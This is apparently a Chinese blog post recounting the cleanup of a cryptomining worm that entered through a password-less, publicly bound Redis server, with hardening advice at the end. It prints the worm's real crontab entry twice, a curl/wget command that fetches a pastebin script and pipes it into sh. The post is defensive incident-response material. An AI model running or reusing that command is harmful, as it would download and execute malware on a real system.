中毒原因,redis bind 0.0.0.0 而且沒有密碼,和安全意識太薄弱。
所以,redis一定要設密碼,改端口,不要用root用戶啟動,如果業務沒有需要,不要bind 0.0.0.0!!!!!!!!!!!
這個病毒能都橫向傳播,不要以為在外網redis的端口不通就沒有事情。只要內網里有機器感染了病毒,就可以繼續感染。
病症:CPU被不明進程吃滿。
該病毒主要是通過,crontab定時任務,向指定網站下載腳本,運行進行挖礦。
通過crontab -l 就能查看
*/15 * * * * (curl -fsSL https://pastebin.com/raw/HdjSc4JR||wget -q -O- https://pastebin.com/raw/HdjSc4JR)|sh
通過crontab -r 和crontab -e 是刪除不掉的,因為本地有進程維護着這個定時任務。
而且,這個病毒還劫持了一些linux系統的命令,比如ps。
處理過程:
1.利用linux的iptables,對上方ip網段的進出口都封殺。這樣能夠治標,將CPU降下來。修改redis密碼。
2.檢查用戶下的.ssh文件夾,刪除不是自己的公鑰。中毒的時候,有可能被寫入了對方的公鑰,使得別人不需要密碼,直接登錄ssh登錄
3.利用默安科技的清理工具,進行清理。github地址:https://github.com/MoreSecLab/DDG_MalWare_Clean_Tool
4.清理之后,linux的ps命令應該是正常了,通過ps -ef 找出kerberods的相關的進程樹進行殺掉,注意,病毒可能變種,還需要具體問題具體分析。
5.病毒進程殺掉之后,應該可以修改crontab里的內容了。到這里了還不行,還需要檢查/var/spool/cron/ , /var/spool/cron/crontabs/ 和 /etc/cron.d/ 下的用戶文件,有可能也被寫入了定時任務,然后配合linux的 anacron就有可能替換cron,從而還原crontab定時任務。
上面大概就是這次清理這個病毒的大致過程,搞了兩天,終於將ps進程里的 (curl -fsSL https://pastebin.com/raw/HdjSc4JR||wget -q -O- https://pastebin.com/raw/HdjSc4JR)|sh 干掉了。現在還在繼續觀察着,,,,,,
血的教訓,服務器安全意識還是要有啊。redis能不bind 0.0.0.0 就不bind , 同時一定要設密碼,創建新的用戶來啟動redis,限制啟動redis的用戶登錄權限。
PS:如果確定了病毒是通過定時任務來執行的,可以對定時任務進行跟蹤,查看都執行了什么。
strace -o output.txt -T -f -ff -tt -e trace=all -p 定時任務PID